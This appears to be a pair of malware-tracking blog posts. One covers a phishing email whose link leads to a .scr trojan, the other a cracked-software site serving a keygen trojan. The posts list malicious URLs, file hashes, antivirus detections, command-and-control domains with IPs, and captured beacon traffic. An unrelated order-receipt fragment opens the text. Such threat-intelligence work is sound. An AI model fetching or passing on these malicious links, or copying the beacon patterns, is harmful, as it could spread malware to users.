Your order reference is 061042.
You will need this in all correspondence.

This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.

You have chosen to pay by credit card.
Your card will be charged for the amount of 244.00 USD and

Malware: Nova cotacao…

Honeypot reported a suspicious email:

Return-Path: <apache@94.229.165.236.srvlist.ukfast.net>
Received: from 94.229.165.236.srvlist.ukfast.net (94.229.165.236.srvlist.ukfast.net [94.229.165.236])
Received: from 94.229.165.236.srvlist.ukfast.net (unknown [127.0.0.1]) by 94.229.165.236.srvlist.ukfast.net
Received: by 94.229.165.236.srvlist.ukfast.net (Postfix, from userid 48)
Subject: Nova cotacao...
Date: Tue, 26 Apr 2011 07:14:29 +0100 (BST)

This is the malicious URL contained in the message:

gwayprototype. com/support/img/thumb2.php?#documento_relatorio
HTTP/1.1 302 Object Moved
Location: http://www.abeonas. net/abnor/,,/001/PLANILHA-DOCUMENTO.scr
Server: Microsoft-IIS/4.0
Content-Type: text/html
Connection: close
Content-Length: 174

It redirects to download the infected file:

abeonas. net/abnor/,,/001/PLANILHA-DOCUMENTO.scr

Report 2011-04-25 23:05:38 (GMT 1)
File Name planilha-documento-scr
File Size 157184 bytes
File Type Executable File (EXE)
MD5 Hash 3e66cfb35fee0edeb86da90b0ef780d2
SHA1 Hash 18fdccc4927ad848e74ac742270a1673bf74c7bc
Detections: 5 / 10 (50 %)
Status INFECTED

AVG 25/04/2011 10.0.0.1190 Downloader.Rozena
Comodo 25/04/2011 4.0 TrojWare.Win32.Troja..
Emsisoft 25/04/2011 5.1.0.2 Trojan-PWS.Win32.QQR..
F-Prot 25/04/2011 6.3.3.4884 W32/SuspPack.R.gen!E..
Ikarus 25/04/2011 T31001097 Trojan-PWS.Win32.QQR..

Image of file:

Image

URLVoid domain analysis:

http://www.urlvoid.com/scan/abeonas.net
http://www.urlvoid.com/scan/gwayprototype.com

Free download cracked software with surprise

We have logged another website used to capture keywords related to software and to spread Renos trojan and other dangerous threats as execuable files of software cracks and keygens. The website uses blackhat seo strategies to attract most users possibles and to appear in the first pages of search engines.

Cracked Software Website

The file that is downloaded from the dangerous website is:

Downloaded File

Report 2010-10-28 02:11:21 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 435c56e76544772ae273a324066df2cc
SHA1 Hash 2df1627a8e6dd607ac79b8ed4d3d32ebbadc4bf5
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:11:44 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 80044a9b4867e9e45a465a5628de795f
SHA1 Hash 597ff8fd30eddd9b985fd26fff235277e585e81e
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:17 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 798c460f8a7af4a54f863ff68fec064a
SHA1 Hash 78d20e58b107111ca552d65137a65335375bd012
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:39 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 1ec2315af5929d0462fc9c5dd1e6aaf1
SHA1 Hash d72d642b5f4a6e11766b274f64d2263263fd58ee
Detections: 2 / 16 (13 %)
Status INFECTED

An interesting thing is that everytime we tried to download the infected file, it had always a different md5 checksum hash. This means that most probably the payload is created on-the-fly or there are various executable versions of the malware stored in the server, that are downloaded randomly. Is possible this is done to make sure the website distributes always an up-to-date malware executable, and so not detected by security software.

During the analysis, the following files have been created in our system:

Created Files

Suspicious DNS queries:

megadataonline .net .....
mydynatri .net .....
zoozus .com .....
threezio .com .....
sina.com .cn .....
waytoall .com .....
topdworld .com .....
thevehic .com .....
ad.tlvmedia .com .....

Network traffic:

POST /muchahos.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: megadataonline .net
 
POST /logos/bd305e793bda3beeb28218754d729da6f334759cdd06b5446bb70c4cc2842087c284f404583eee08b/0485038023a/logo.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mydynatri .net
 
POST /werber/94653350334/217.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: zoozus .com
 
POST /perce/fd103eb9fbba9bfe524268857d427d06236465cccda62504eb372cece2b4b0e7c2e4a4b4984ebef88/1475f360f30/qwerce.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: threezio .com
 
POST /borders.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: waytoall .com
 
POST /1wave.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topdworld .com
 
GET /2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d HTTP/1.1
Referer: hxxp://ovguide .com/
Host: thevehic .com
 
GET /st?ad_type=iframe&ad_size=120x600&section=1447253 HTTP/1.1
Referer: hxxp://thevehic .com/2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d
Host: ad.tlvmedia .com

The malware looks like to have posted, with the method “POST”, a lot of encrypted data to various website urls and at the end it received commands to visit some advertisement links.

Domaind & IP Analysis:

sotapartners.net174.123.211.138 – AS: 21844
data-mortgage.com78.46.76.170 – AS: 24940
megadataonline.net64.191.16.70 – AS: 21788
mydynatri.net77.78.248.84 – AS: 42560
zoozus.com85.234.190.47 – AS: 6851
threezio.com77.78.239.42 – AS: 42560
waytoall.com96.9.157.39 – AS: 21788
topdworld.com173.212.250.130 – AS: 21788
thevehic.com173.212.245.243 – AS: 21788
ad.tlvmedia.com217.163.21.37 – AS: 42173

Other suspicious domains hosted in 64.191.16.70:

brodiero.com64.191.16.70 – AS: 21788
megadatacentral.net64.191.16.70 – AS: 21788
megadataonline.net64.191.16.70 – AS: 21788
spiderfile.net87.255.51.229 – AS: 38930

Other suspicious domains hosted in 85.234.190.47:

chattertune.net85.234.190.47 – AS: 6851
mybubblebean.com – – – AS: NA
roonotimex.com85.234.190.47 – AS: 6851